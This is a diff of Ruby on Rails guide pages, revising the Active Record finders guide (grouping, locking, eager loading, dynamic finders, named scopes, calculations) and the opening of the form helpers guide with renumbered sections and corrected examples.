        The group option for find is useful, for example, if you want to find a collection of the dates orders were created on. You could use the option in this context:

        +

        The group option for find is useful, for example, if you want to find a collection of the dates orders were created on. You could use the option in this context:

        +
        +
        +
        Order.all(:group => "date(created_at)", :order => "created_at")
        +

        And this will give you a single Order object for each date where there are orders in the database.

        +

        The SQL that would be executed would be something like this:

        -
        Order.all(:group => "date(created_at)", :order => "created_at")
        -
        -

        And this will give you a single Order object for each date where there are orders in the database.

        -

        The SQL that would be executed would be something like this:

        +
        SELECT * FROM orders GROUP BY date(created_at)
        + +

        9. Having

        +
        +

        The :having option allows you to specify SQL and acts as a kind of a filter on the group option. :having can only be specified when :group is specified.

        +

        An example of using it would be:

        -
        SELECT * FROM orders GROUP BY date(created_at)
        -
        +
        Order.all(:group => "date(created_at)", :having => ["created_at > ?", 1.month.ago])
        +

        This will return single order objects for each day, but only for the last month.

        -

        9. Read Only

        +

        10. Read Only

        -

        Readonly is a find option that you can set in order to make that instance of the record read-only. Any attempt to alter or destroy the record will not succeed, raising an Active Record::ReadOnlyRecord exception. To set this option, specify it like this:

        +

        readonly is a find option that you can set in order to make that instance of the record read-only. Any attempt to alter or destroy the record will not succeed, raising an ActiveRecord::ReadOnlyRecord exception. To set this option, specify it like this:

        -
        Client.first(:readonly => true)
        -
        -

        If you assign this record to a variable client, calling the following code will raise an ActiveRecord::ReadOnlyRecord exception:

        +
        Client.first(:readonly => true)
        +

        If you assign this record to a variable client, calling the following code will raise an ActiveRecord::ReadOnlyRecord exception:

        client = Client.first(:readonly => true)
         client.locked = false
        -client.save
        -
        +client.save -

        10. Lock

        +

        11. Lock

        -

        If you're wanting to stop race conditions for a specific record (for example, you're incrementing a single field for a record, potentially from multiple simultaneous connections) you can use the lock option to ensure that the record is updated correctly. For safety, you should use this inside a transaction.

        +

        If you’re wanting to stop race conditions for a specific record (for example, you’re incrementing a single field for a record, potentially from multiple simultaneous connections) you can use the lock option to ensure that the record is updated correctly. For safety, you should use this inside a transaction.

        Topic.transaction do
           t = Topic.find(params[:id], :lock => true)
           t.increment!(:views)
        -end
        -
        +end
        +

        You can also pass SQL to this option to allow different types of locks. For example, MySQL has an expression called LOCK IN SHARE MODE where you can lock a record but still allow other queries to read it. To specify this expression just pass it in as the lock option:

        +
        +
        +
        Topic.transaction do
        +  t = Topic.find(params[:id], :lock => "LOCK IN SHARE MODE")
        +  t.increment!(:views)
        +end
        -

        11. Making It All Work Together

        +

        12. Making It All Work Together

        -

        You can chain these options together in no particular order as Active Record will write the correct SQL for you. If you specify two instances of the same options inside the find statement Active Record will use the latter.

        +

        You can chain these options together in no particular order as Active Record will write the correct SQL for you. If you specify two instances of the same options inside the find method Active Record will use the last one you specified. This is because the options passed to find are a hash and defining the same key twice in a hash will result in the last definition being used.

        -

        12. Eager Loading

        +

        13. Eager Loading

        -

        Eager loading is loading associated records along with any number of records in as few queries as possible. For example, if you wanted to load all the addresses associated with all the clients in a single query you could use Client.all(:include ⇒ :address). If you wanted to include both the address and mailing address for the client you would use +Client.find(:all, :include ⇒ [:address, :mailing_address]). Include will first find the client records and then load the associated address records. Running script/server in one window, and executing the code through script/console in another window, the output should look similar to this:

        +

        Eager loading is loading associated records along with any number of records in as few queries as possible. For example, if you wanted to load all the addresses associated with all the clients in a single query you could use Client.all(:include => :address). If you wanted to include both the address and mailing address for the client you would use Client.find(:all, :include => [:address, :mailing_address]). Include will first find the client records and then load the associated address records. Running script/server in one window, and executing the code through script/console in another window, the output should look similar to this:

        Address Load (0.119770) SELECT addresses.* FROM addresses WHERE (addresses.client_id IN (13,14)) MailingAddress Load (0.001985) SELECT mailing_addresses.* FROM - mailing_addresses WHERE (mailing_addresses.client_id IN (13,14)) -
        -

        The numbers 13 and 14 in the above SQL are the ids of the clients gathered from the Client.all query. Rails will then run a query to gather all the addresses and mailing addresses that have a client_id of 13 or 14. Although this is done in 3 queries, this is more efficient than not eager loading because without eager loading it would run a query for every time you called address or mailing_address on one of the objects in the clients array, which may lead to performance issues if you're loading a large number of records at once.

        -

        If you wanted to get all the addresses for a client in the same query you would do Client.all(:joins ⇒ :address) and you wanted to find the address and mailing address for that client you would do Client.all(:joins ⇒ [:address, :mailing_address]). This is more efficient because it does all the SQL in one query, as shown by this example:

        + mailing_addresses WHERE (mailing_addresses.client_id IN (13,14))
        +

        The numbers 13 and 14 in the above SQL are the ids of the clients gathered from the Client.all query. Rails will then run a query to gather all the addresses and mailing addresses that have a client_id of 13 or 14. Although this is done in 3 queries, this is more efficient than not eager loading because without eager loading it would run a query for every time you called address or mailing_address on one of the objects in the clients array, which may lead to performance issues if you’re loading a large number of records at once and is often called the "N+1 query problem". The problem is that the more queries your server has to execute, the slower it will run.

        +

        If you wanted to get all the addresses for a client in the same query you would do Client.all(:joins => :address). +If you wanted to find the address and mailing address for that client you would do Client.all(:joins => [:address, :mailing_address]). This is more efficient because it does all the SQL in one query, as shown by this example:

        +Client Load (0.000455)   SELECT clients.* FROM clients INNER JOIN addresses
           ON addresses.client_id = client.id INNER JOIN mailing_addresses ON
        -  mailing_addresses.client_id = client.id
        -
        -

        This query is more efficent, but there's a gotcha: if you have a client who does not have an address or a mailing address they will not be returned in this query at all. If you have any association as an optional association, you may want to use include rather than joins. Alternatively, you can use a SQL join clause to specify exactly the join you need (Rails always assumes an inner join):

        + mailing_addresses.client_id = client.id +

        This query is more efficent, but there’s a gotcha: if you have a client who does not have an address or a mailing address they will not be returned in this query at all. If you have any association as an optional association, you may want to use include rather than joins. Alternatively, you can use a SQL join clause to specify exactly the join you need (Rails always assumes an inner join):

        Client.all(:joins => “LEFT OUTER JOIN addresses ON
           client.id = addresses.client_id LEFT OUTER JOIN mailing_addresses ON
        -  client.id = mailing_addresses.client_id”)
        -
        -

        When using eager loading you can specify conditions for the columns of the tables inside the eager loading to get back a smaller subset. If, for example, you want to find a client and all their orders within the last two weeks you could use eager loading with conditions for this:

        + client.id = mailing_addresses.client_id”) +

        When using eager loading you can specify conditions for the columns of the tables inside the eager loading to get back a smaller subset. If, for example, you want to find a client and all their orders within the last two weeks you could use eager loading with conditions for this:

        Client.first(:include => "orders", :conditions =>
        -  ["orders.created_at >= ? AND orders.created_at <= ?", Time.now - 2.weeks, Time.now])
        -
        + ["orders.created_at >= ? AND orders.created_at <= ?", 2.weeks.ago, Time.now]) -

        13. Dynamic finders

        +

        14. Dynamic finders

        -

        For every field (also known as an attribute) you define in your table, Active Record provides a finder method. If you have a field called name on your Client model for example, you get find_by_name and find_all_by_name for free from Active Record. If you have also have a locked field on the client model, you also get find_by_locked and find_all_by_locked.

        -

        You can do find_last_by_* methods too which will find the last record matching your parameter.

        -

        You can specify an exclamation point (!) on the end of the dynamic finders to get them to raise an ActiveRecord::RecordNotFound error if they do not return any records, like Client.find_by_name!(Ryan)

        -

        If you want to find both by name and locked, you can chain these finders together by simply typing and between the fields for example Client.find_by_name_and_locked(Ryan, true).

        -

        There's another set of dynamic finders that let you find or create/initialize objects if they aren't find. These work in a similar fashion to the other finders and can be used like find_or_create_by_name(params[:name]). Using this will firstly perform a find and then create if the find returns nil. The SQL looks like this for Client.find_or_create_by_name(Ryan):

        +

        For every field (also known as an attribute) you define in your table, Active Record provides a finder method. If you have a field called name on your Client model for example, you get find_by_name and find_all_by_name for free from Active Record. If you have also have a locked field on the Client model, you also get find_by_locked and find_all_by_locked.

        +

        You can do find_last_by_* methods too which will find the last record matching your argument.

        +

        You can specify an exclamation point (!) on the end of the dynamic finders to get them to raise an ActiveRecord::RecordNotFound error if they do not return any records, like Client.find_by_name!("Ryan")

        +

        If you want to find both by name and locked, you can chain these finders together by simply typing and between the fields for example Client.find_by_name_and_locked("Ryan", true).

        +

        There’s another set of dynamic finders that let you find or create/initialize objects if they aren’t found. These work in a similar fashion to the other finders and can be used like find_or_create_by_name(params[:name]). Using this will firstly perform a find and then create if the find returns nil. The SQL looks like this for Client.find_or_create_by_name("Ryan"):

        SELECT * FROM clients WHERE (clients.name = 'Ryan') LIMIT 1
         BEGIN
         INSERT INTO clients (name, updated_at, created_at, orders_count, locked)
        -  VALUES('Ryan', '2008-09-28 15:39:12', '2008-09-28 15:39:12', '0', '0')
        -COMMIT
        -
        -

        find_or_create's sibling, find_or_initialize, will find an object and if it does not exist will act similar to calling new with the parameters you passed in. For example:

        + VALUES('Ryan', '2008-09-28 15:39:12', '2008-09-28 15:39:12', 0, '0') +COMMIT
        +

        find_or_create's sibling, find_or_initialize, will find an object and if it does not exist will act similar to calling new with the arguments you passed in. For example:

        -
        client = Client.find_or_initialize_by_name('Ryan')
        -
        -

        will either assign an existing client object with the name Ryan to the client local variable, or initialize new object similar to calling Client.new(:name ⇒ Ryan). From here, you can modify other fields in client by calling the attribute setters on it: client.locked = true and when you want to write it to the database just call save on it.

        +
        client = Client.find_or_initialize_by_name('Ryan')
        +

        will either assign an existing client object with the name Ryan to the client local variable, or initialize a new object similar to calling Client.new(:name => Ryan). From here, you can modify other fields in client by calling the attribute setters on it: client.locked = true and when you want to write it to the database just call save on it.

        -

        14. Finding By SQL

        +

        15. Finding By SQL

        -

        If you'd like to use your own SQL to find records a table you can use find_by_sql. The find_by_sql method will return an array of objects even if it only returns a single record in it's call to the database. For example you could run this query:

        +

        If you’d like to use your own SQL to find records in a table you can use find_by_sql. The find_by_sql method will return an array of objects even the underlying query returns just a single record. For example you could run this query:

        -
        Client.find_by_sql("SELECT * FROM clients INNER JOIN orders ON clients.id = orders.client_id ORDER clients.created_at desc")
        -
        -

        find_by_sql provides you with a simple way of making custom calls to the database and retrieving instantiated objects.

        +
        Client.find_by_sql("SELECT * FROM clients INNER JOIN orders ON clients.id = orders.client_id ORDER clients.created_at desc")
        +

        find_by_sql provides you with a simple way of making custom calls to the database and retrieving instantiated objects.

        -

        15. select_all

        +

        16. select_all

        -

        find_by_sql has a close relative called connection#select_all. select_all will retrieve objects from the database using custom SQL just like find_by_sql but will not instantiate them. Instead, you will get an array of hashes where each hash indicates a record.

        +

        find_by_sql has a close relative called connection#select_all. select_all will retrieve objects from the database using custom SQL just like find_by_sql but will not instantiate them. Instead, you will get an array of hashes where each hash indicates a record.

        -
        Client.connection.select_all("SELECT * FROM `clients` WHERE `id` = '1'")
        -
        +
        Client.connection.select_all("SELECT * FROM `clients` WHERE `id` = '1'")
        -

        16. Working with Associations

        +

        17. Working with Associations

        -

        When you define a has_many association on a model you get the find method and dynamic finders also on that association. This is helpful for finding associated records within the scope of an existing record, for example finding all the orders for a client that have been sent and not received by doing something like Client.find(params[:id]).orders.find_by_sent_and_received(true, false). Having this find method available on associations is extremely helpful when using nested controllers.

        +

        When you define a has_many association on a model you get the find method and dynamic finders also on that association. This is helpful for finding associated records within the scope of an existing record, for example finding all the orders for a client that have been sent and not received by doing something like Client.find(params[:id]).orders.find_by_sent_and_received(true, false). Having this find method available on associations is extremely helpful when using nested resources.

        -

        17. Named Scopes

        +

        18. Named Scopes

        -

        Named scopes are another way to add custom finding behavior to the models in the application. Named scopes provide an object-oriented way to narrow the results of a query.

        -

        17.1. Simple Named Scopes

        -

        Suppose want to find all clients who are male. You could use this code:

        +

        Named scopes are another way to add custom finding behavior to the models in the application. Named scopes provide an object-oriented way to narrow the results of a query.

        +

        18.1. Simple Named Scopes

        +

        Suppose we want to find all clients who are male. You could use this code:

        class Client < ActiveRecord::Base
           named_scope :males, :conditions => { :gender => "male" }
        -end
        -
        -

        Then you could call Client.males.all to get all the clients who are male. Please note that if you do not specify the all on the end you will get a Scope object back, not a set of records which you do get back if you put the all on the end.

        -

        If you wanted to find all the clients who are active, you could use this:

        +end
        +

        Then you could call Client.males.all to get all the clients who are male. Please note that if you do not specify the all on the end you will get a Scope object back, not a set of records which you do get back if you put the all on the end.

        +

        If you wanted to find all the clients who are active, you could use this:

        class Client < ActiveRecord::Base
           named_scope :active, :conditions => { :active => true }
        -end
        -
        -

        You can call this new named_scope with Client.active.all and this will do the same query as if we just used Client.all(:conditions ⇒ ["active = ?", true]). Please be aware that the conditions syntax in named_scope and find is different and the two are not interchangeable. If you want to find the first client within this named scope you could do Client.active.first.

        -

        17.2. Combining Named Scopes

        -

        If you wanted to find all the clients who are active and male you can stack the named scopes like this:

        +end +

        You can call this new named_scope with Client.active.all and this will do the same query as if we just used Client.all(:conditions => ["active = ?", true]). If you want to find the first client within this named scope you could do Client.active.first.

        +

        18.2. Combining Named Scopes

        +

        If you wanted to find all the clients who are active and male you can stack the named scopes like this:

        -
        Client.males.active.all
        -
        -

        If you would then like to do a all on that scope, you can. Just like an association, named scopes allow you to call all on them:

        +
        Client.males.active.all
        +

        If you would then like to do a all on that scope, you can. Just like an association, named scopes allow you to call all on them:

        -
        Client.males.active.all(:conditions => ["age > ?", params[:age]])
        -
        -

        17.3. Runtime Evaluation of Named Scope Conditions

        -

        Consider the following code:

        +
        Client.males.active.all(:conditions => ["age > ?", params[:age]])
        +

        18.3. Runtime Evaluation of Named Scope Conditions

        +

        Consider the following code:

        class Client < ActiveRecord::Base
           named_scope :recent, :conditions => { :created_at > 2.weeks.ago }
        -end
        -
        -

        This looks like a standard named scope that defines a method called recent which gathers all records created any time between now and 2 weeks ago. That's correct for the first time the model is loaded but for any time after that, 2.weeks.ago is set to that same value, so you will consistently get records from a certain date until your model is reloaded by something like your application restarting. The way to fix this is to put the code in a lambda block:

        +end +

        This looks like a standard named scope that defines a method called recent which gathers all records created any time between now and 2 weeks ago. That’s correct for the first time the model is loaded but for any time after that, 2.weeks.ago is set to that same value, so you will consistently get records from a certain date until your model is reloaded by something like your application restarting. The way to fix this is to put the code in a lambda block:

        class Client < ActiveRecord::Base
           named_scope :recent, lambda { { :conditions => ["created_at > ?", 2.weeks.ago] } }
        -end
        -
        -

        And now every time the recent named scope is called, the code in the lambda block will be parsed, so you'll get actually 2 weeks ago from the code execution, not 2 weeks ago from the time the model was loaded.

        -

        17.4. Named Scopes with Multiple Models

        -

        In a named scope you can use :include and :joins options just like in find.

        +end +

        And now every time the recent named scope is called, the code in the lambda block will be executed, so you’ll get actually 2 weeks ago from the code execution, not 2 weeks ago from the time the model was loaded.

        +

        18.4. Named Scopes with Multiple Models

        +

        In a named scope you can use :include and :joins options just like in find.

        class Client < ActiveRecord::Base
           named_scope :active_within_2_weeks, :joins => :order,
             lambda { { :conditions => ["orders.created_at > ?", 2.weeks.ago] } }
        -end
        -
        -

        This method, called as Client.active_within_2_weeks.all, will return all clients who have placed orders in the past 2 weeks.

        -

        17.5. Arguments to Named Scopes

        -

        If you want to pass a named scope a compulsory argument, just specify it as a block parameter like this:

        +end +

        This method, called as Client.active_within_2_weeks.all, will return all clients who have placed orders in the past 2 weeks.

        +

        18.5. Arguments to Named Scopes

        +

        If you want to pass to a named scope a required arugment, just specify it as a block argument like this:

        class Client < ActiveRecord::Base
           named_scope :recent, lambda { |time| { :conditions => ["created_at > ?", time] } }
        -end
        -
        -

        This will work if you call Client.recent(2.weeks.ago).all but not if you call Client.recent. If you want to add an optional argument for this, you have to use the splat operator as the block's parameter.

        +end +

        This will work if you call Client.recent(2.weeks.ago).all but not if you call Client.recent. If you want to add an optional argument for this, you have to use prefix the arugment with an *.

        class Client < ActiveRecord::Base
           named_scope :recent, lambda { |*args| { :conditions => ["created_at > ?", args.first || 2.weeks.ago] } }
        -end
        -
        -

        This will work with Client.recent(2.weeks.ago).all and Client.recent.all, with the latter always returning records with a created_at date between right now and 2 weeks ago.

        -

        Remember that named scopes are stackable, so you will be able to do Client.recent(2.weeks.ago).unlocked.all to find all clients created between right now and 2 weeks ago and have their locked field set to false.

        -

        17.6. Anonymous Scopes

        -

        All Active Record models come with a named scope named scoped, which allows you to create anonymous scopes. For example:

        +end +

        This will work with Client.recent(2.weeks.ago).all and Client.recent.all, with the latter always returning records with a created_at date between right now and 2 weeks ago.

        +

        Remember that named scopes are stackable, so you will be able to do Client.recent(2.weeks.ago).unlocked.all to find all clients created between right now and 2 weeks ago and have their locked field set to false.

        +

        18.6. Anonymous Scopes

        +

        All Active Record models come with a named scope named scoped, which allows you to create anonymous scopes. For example:

        def self.recent scoped :conditions => ["created_at > ?", 2.weeks.ago] end -end -
        -

        Anonymous scopes are most useful to create scopes "on the fly":

        +end +

        Anonymous scopes are most useful to create scopes "on the fly":

        -
        Client.scoped(:conditions => { :gender => "male" })
        -
        -

        Just like named scopes, anonymous scopes can be stacked, either with other anonymous scopes or with regular named scopes.

        +
        Client.scoped(:conditions => { :gender => "male" })
        +

        Just like named scopes, anonymous scopes can be stacked, either with other anonymous scopes or with regular named scopes.

        -

        18. Existence of Objects

        +

        19. Existence of Objects

        -

        If you simply want to check for the existence of the object there's a method called exists?. This method will query the database using the same query as find, but instead of returning an object or collection of objects it will return either true or false.

        +

        If you simply want to check for the existence of the object there’s a method called exists?. This method will query the database using the same query as find, but instead of returning an object or collection of objects it will return either true or false+.

        -
        Client.exists?(1)
        -
        -

        The above code will check for the existence of a clients table record with the id of 1 and return true if it exists.

        +
        Client.exists?(1)
        +

        The exists? method also takes multiple ids, but the catch is that it will return true if any one of those records exists.

        Client.exists?(1,2,3)
         # or
        -Client.exists?([1,2,3])
        -
        -

        The exists? method also takes multiple ids, as shown by the above code, but the catch is that it will return true if any one of those records exists.

        -

        Further more, exists takes a conditions option much like find:

        +Client.exists?([1,2,3]) +

        Further more, exists takes a conditions option much like find:

        -
        Client.exists?(:conditions => "first_name = 'Ryan'")
        -
        +
        Client.exists?(:conditions => "first_name = 'Ryan'")
        -

        19. Calculations

        +

        20. Calculations

        -

        This section uses count as an example method in this preamble, but the options described apply to all sub-sections.

        -

        count takes conditions much in the same way exists? does:

        +

        This section uses count as an example method in this preamble, but the options described apply to all sub-sections.

        +

        count takes conditions much in the same way exists? does:

        -
        Client.count(:conditions => "first_name = 'Ryan'")
        -
        -

        Which will execute:

        +
        Client.count(:conditions => "first_name = 'Ryan'")
        +

        Which will execute:

        -
        SELECT count(*) AS count_all FROM clients WHERE (first_name = 1)
        -
        -

        You can also use include or joins for this to do something a little more complex:

        +
        SELECT count(*) AS count_all FROM clients WHERE (first_name = 'Ryan')
        +

        You can also use :include or :joins for this to do something a little more complex:

        -
        Client.count(:conditions => "clients.first_name = 'Ryan' AND orders.status = 'received'", :include => "orders")
        -
        -

        Which will execute:

        +
        Client.count(:conditions => "clients.first_name = 'Ryan' AND orders.status = 'received'", :include => "orders")
        +

        Which will execute:

        SELECT count(DISTINCT clients.id) AS count_all FROM clients
           LEFT OUTER JOIN orders ON orders.client_id = client.id WHERE
        -  (clients.first_name = 'name' AND orders.status = 'received')
        -
        -

        This code specifies clients.first_name just in case one of the join tables has a field also called first_name and it uses orders.status because that's the name of our join table.

        -

        19.1. Count

        -

        If you want to see how many records are in your model's table you could call Client.count and that will return the number. If you want to be more specific and find all the clients with their age present in the database you can use Client.count(:age).

        -

        For options, please see the parent section, Calculations.

        -

        19.2. Average

        -

        If you want to see the average of a certain number in one of your tables you can call the average method on the class that relates to the table. This method call will look something like this:

        + (clients.first_name = 'Ryan' AND orders.status = 'received') +

        This code specifies clients.first_name just in case one of the join tables has a field also called first_name and it uses orders.status because that’s the name of our join table.

        +

        20.1. Count

        +

        If you want to see how many records are in your model’s table you could call Client.count and that will return the number. If you want to be more specific and find all the clients with their age present in the database you can use Client.count(:age).

        +

        For options, please see the parent section, Calculations.

        +

        20.2. Average

        +

        If you want to see the average of a certain number in one of your tables you can call the average method on the class that relates to the table. This method call will look something like this:

        -
        Client.average("orders_count")
        -
        -

        This will return a number (possibly a floating point number such as 3.14159265) representing the average value in the field.

        -

        For options, please see the parent section, Calculations

        -

        19.3. Minimum

        -

        If you want to find the minimum value of a field in your table you can call the minimum method on the class that relates to the table. This method call will look something like this:

        +
        Client.average("orders_count")
        +

        This will return a number (possibly a floating point number such as 3.14159265) representing the average value in the field.

        +

        For options, please see the parent section, Calculations.

        +

        20.3. Minimum

        +

        If you want to find the minimum value of a field in your table you can call the minimum method on the class that relates to the table. This method call will look something like this:

        -
        Client.minimum("age")
        -
        -

        For options, please see the parent section, Calculations

        -

        19.4. Maximum

        -

        If you want to find the maximum value of a field in your table you can call the maximum method on the class that relates to the table. This method call will look something like this:

        +
        Client.minimum("age")
        +

        For options, please see the parent section, Calculations

        +

        20.4. Maximum

        +

        If you want to find the maximum value of a field in your table you can call the maximum method on the class that relates to the table. This method call will look something like this:

        -
        Client.maximum("age")
        -
        -

        For options, please see the parent section, Calculations

        -

        19.5. Sum

        -

        If you want to find the sum of a field for all records in your table you can call the sum method on the class that relates to the table. This method call will look something like this:

        +
        Client.maximum("age")
        +

        For options, please see the parent section, Calculations

        +

        20.5. Sum

        +

        If you want to find the sum of a field for all records in your table you can call the sum method on the class that relates to the table. This method call will look something like this:

        -
        Client.sum("orders_count")
        -
        -

        For options, please see the parent section, Calculations

        +
        Client.sum("orders_count")
        +

        For options, please see the parent section, Calculations

        -

        20. Credits

        +

        21. Credits

        -

        Thanks to Ryan Bates for his awesome screencast on named scope #108. The information within the named scope section is intentionally similar to it, and without the cast may have not been possible.

        -

        Thanks to Mike Gunderloy for his tips on creating this guide.

        +

        Thanks to Ryan Bates for his awesome screencast on named scope #108. The information within the named scope section is intentionally similar to it, and without the cast may have not been possible.

        +

        Thanks to Mike Gunderloy for his tips on creating this guide.

        -

        21. Changelog

        +

        22. Changelog

        - -
          + +
          + +
        • + Miscellaneous +
        • @@ -237,9 +253,9 @@ ul#navMain {

          Rails form helpers

          -

          Forms in web applications are an essential interface for user input. However, form markup can quickly become tedious to write and maintain because of form control naming and their numerous attributes. Rails deals away with these complexities by providing view helpers for generating form markup. However, since they have different use-cases, developers are required to know all the differences between similar helper methods before putting them to use.

          -

          In this guide we will:

          -
            +

            Forms in web applications are an essential interface for user input. However, form markup can quickly become tedious to write and maintain because of form control naming and their numerous attributes. Rails deals away with these complexities by providing view helpers for generating form markup. However, since they have different use-cases, developers are required to know all the differences between similar helper methods before putting them to use.

            +

            In this guide we will:

            +
            • Create search forms and similar kind of generic forms not representing any specific model in your application; @@ -278,16 +294,16 @@ Build complex, multi-model forms.

            1. Basic forms

            -

            The most basic form helper is form_tag.

            +

            The most basic form helper is form_tag.

            <% form_tag do %>
               Form contents
             <% end %>
            -

            When called without arguments like this, it creates a form element that has the current page for action attribute and "POST" as method (some line breaks added for readability):

            +

            When called without arguments like this, it creates a form element that has the current page for action attribute and "POST" as method (some line breaks added for readability):

            -
            Example: Sample rendering of form_tag
            +
            Sample rendering of form_tag
            <form action="/home/index" method="post">
               <div style="margin:0;padding:0">
            @@ -296,7 +312,7 @@ Build complex, multi-model forms.
               Form contents
             </form>
            -

            If you carefully observe this output, you can see that the helper generated something we didn't specify: a div element with a hidden input inside. This is a security feature of Rails called cross-site request forgery protection and form helpers generate it for every form which action isn't "GET" (provided that this security feature is enabled).

            +

            If you carefully observe this output, you can see that the helper generated something we didn’t specify: a div element with a hidden input inside. This is a security feature of Rails called cross-site request forgery protection and form helpers generate it for every form which action isn’t "GET" (provided that this security feature is enabled).

            @@ -306,7 +322,7 @@ Build complex, multi-model forms.

            1.1. Generic search form

            -

            Probably the most minimal form often seen on the web is a search form with a single text input for search terms. This form consists of:

            +

            Probably the most minimal form often seen on the web is a search form with a single text input for search terms. This form consists of:

            1. @@ -337,9 +353,9 @@ a submit element.

        Always use "GET" as the method for search forms. Benefits are many: users are able to bookmark a specific search and get back to it; browsers cache results of "GET" requests, but not "POST"; and other.
        -

        To create that, we will use form_tag, label_tag, text_field_tag and submit_tag, respectively.

        +

        To create that, we will use form_tag, label_tag, text_field_tag and submit_tag, respectively.

        -
        Example: A basic search form
        +
        A basic search form
        <% form_tag(search_path, :method => "get") do %>
           <%= label_tag(:q, "Search for:") %>
        @@ -353,7 +369,7 @@ a submit element.
         Tip
         
    -

    search_path can be a named route specified in "routes.rb":

    +

    search_path can be a named route specified in "routes.rb":

    map.search "search", :controller => "search"
    @@ -361,9 +377,9 @@ a submit element.
    -

    The above view code will result in the following markup:

    +

    The above view code will result in the following markup:

    -
    Example: Search form HTML
    +
    Search form HTML
    <form action="/search" method="get">
       <label for="q">Search for:</label>
    @@ -371,7 +387,7 @@ a submit element.
       <input name="commit" type="submit" value="Search" />
     </form>
    -

    Besides text_field_tag and submit_tag, there is a similar helper for every form control in HTML.

    +

    Besides text_field_tag and submit_tag, there is a similar helper for every form control in HTML.

    @@ -381,22 +397,22 @@ a submit element.

    1.2. Multiple hashes in form helper attributes

    -

    By now we've seen that the form_tag helper accepts 2 arguments: the path for the action attribute and an options hash for parameters (like :method).

    -

    Identical to the link_to helper, the path argument doesn't have to be given as string or a named route. It can be a hash of URL parameters that Rails' routing mechanism will turn into a valid URL. Still, we cannot simply write this:

    +

    By now we’ve seen that the form_tag helper accepts 2 arguments: the path for the action attribute and an options hash for parameters (like :method).

    +

    Identical to the ‘link_to` helper, the path argument doesn’t have to be given as string or a named route. It can be a hash of URL parameters that Rails’ routing mechanism will turn into a valid URL. Still, we cannot simply write this:

    -
    Example: A bad way to pass multiple hashes as method arguments
    +
    A bad way to pass multiple hashes as method arguments
    form_tag(:controller => "people", :action => "search", :method => "get")
     # => <form action="/people/search?method=get" method="post">
    -

    Here we wanted to pass two hashes, but the Ruby interpreter sees only one hash, so Rails will construct a URL that we didn't want. The solution is to delimit the first hash (or both hashes) with curly brackets:

    +

    Here we wanted to pass two hashes, but the Ruby interpreter sees only one hash, so Rails will construct a URL that we didn’t want. The solution is to delimit the first hash (or both hashes) with curly brackets:

    -
    Example: The correct way of passing multiple hashes as arguments
    +
    The correct way of passing multiple hashes as arguments
    form_tag({:controller => "people", :action => "search"}, :method => "get")
     # => <form action="/people/search" method="get">
    -

    This is a common pitfall when using form helpers, since many of them accept multiple hashes. So in future, if a helper produces unexpected output, make sure that you have delimited the hash parameters properly.

    +

    This is a common pitfall when using form helpers, since many of them accept multiple hashes. So in future, if a helper produces unexpected output, make sure that you have delimited the hash parameters properly.

    @@ -406,7 +422,7 @@ a submit element.

    1.3. Checkboxes, radio buttons and other controls

    -

    Checkboxes are form controls that give the user a set of options they can enable or disable:

    +

    Checkboxes are form controls that give the user a set of options they can enable or disable:

    <%= check_box_tag(:pet_dog) %>
    @@ -421,7 +437,7 @@ output:
     <input id="pet_cat" name="pet_cat" type="checkbox" value="1" />
       <label for="pet_cat">I own a cat</label>
    -

    Radio buttons, while similar to checkboxes, are controls that specify a set of options in which they are mutually exclusive (user can only pick one):

    +

    Radio buttons, while similar to checkboxes, are controls that specify a set of options in which they are mutually exclusive (user can only pick one):

    <%= radio_button_tag(:age, "child") %>
    @@ -444,7 +460,7 @@ output:
     Always use labels for each checkbox and radio button. They associate text with a specific option and provide a larger clickable region.
     
     
    -

    Other form controls we might mention are the text area, password input and hidden input:

    +

    Other form controls we might mention are the text area, password input and hidden input:

    <%= text_area_tag(:message, "Hi, nice site", :size => "24x6") %>
    @@ -457,18 +473,18 @@ output:
     <input id="password" name="password" type="password" />
     <input id="parent_id" name="parent_id" type="hidden" value="5" />
    -

    Hidden inputs are not shown to the user, but they hold data same as any textual input. Values inside them can be changed with JavaScript.

    +

    Hidden inputs are not shown to the user, but they hold data same as any textual input. Values inside them can be changed with JavaScript.

    - +
    Tip If you're using password input fields (for any purpose), you might want to prevent their values showing up in application logs by activating filter_parameter_logging(:password) in your ApplicationController.If you’re using password input fields (for any purpose), you might want to prevent their values showing up in application logs by activating filter_parameter_logging(:password) in your ApplicationController.

    1.4. How do forms with PUT or DELETE methods work?

    -

    Rails framework encourages RESTful design of your applications, which means you'll be making a lot of "PUT" and "DELETE" requests (besides "GET" and "POST"). Still, most browsers don't support methods other than "GET" and "POST" when it comes to submitting forms. How does this work, then?

    -

    Rails works around this issue by emulating other methods over POST with a hidden input named "_method" that is set to reflect the wanted method:

    +

    Rails framework encourages RESTful design of your applications, which means you’ll be making a lot of "PUT" and "DELETE" requests (besides "GET" and "POST"). Still, most browsers don’t support methods other than "GET" and "POST" when it comes to submitting forms. How does this work, then?

    +

    Rails works around this issue by emulating other methods over POST with a hidden input named "_method" that is set to reflect the wanted method:

    form_tag(search_path, :method => "put")
    @@ -482,21 +498,21 @@ output:
       </div>
       ...
    -

    When parsing POSTed data, Rails will take into account the special "_method" parameter and act as if the HTTP method was the one specified inside it ("PUT" in this example).

    +

    When parsing POSTed data, Rails will take into account the special "_method" parameter and act as if the HTTP method was the one specified inside it ("PUT" in this example).

    2. Forms that deal with model attributes

    -

    When we're dealing with an actual model, we will use a different set of form helpers and have Rails take care of some details in the background. In the following examples we will handle an Article model. First, let us have the controller create one:

    +

    When we’re dealing with an actual model, we will use a different set of form helpers and have Rails take care of some details in the background. In the following examples we will handle an Article model. First, let us have the controller create one:

    -
    Example: articles_controller.rb
    +
    articles_controller.rb
    def new
       @article = Article.new
     end
    -

    Now we switch to the view. The first thing to remember is that we should use form_for helper instead of form_tag, and that we should pass the model name and object as arguments:

    +

    Now we switch to the view. The first thing to remember is that we should use form_for helper instead of form_tag, and that we should pass the model name and object as arguments:

    -
    Example: articles/new.html.erb
    +
    articles/new.html.erb
    <% form_for :article, @article, :url => { :action => "create" } do |f| %>
       <%= f.text_field :title %>
    @@ -504,7 +520,7 @@ end
    <%= submit_tag "Create" %> <% end %>
    -

    There are a few things to note here:

    +

    There are a few things to note here:

    1. @@ -527,7 +543,7 @@ Methods to create form controls are called on the form builder

    -

    The resulting HTML is:

    +

    The resulting HTML is:

    <form action="/articles/create" method="post">
    @@ -536,19 +552,19 @@ Methods to create form controls are called on the form builder
       <input name="commit" type="submit" value="Create" />
     </form>
    -

    A nice thing about f.text_field and other helper methods is that they will pre-fill the form control with the value read from the corresponding attribute in the model. For example, if we created the article instance by supplying an initial value for the title in the controller:

    +

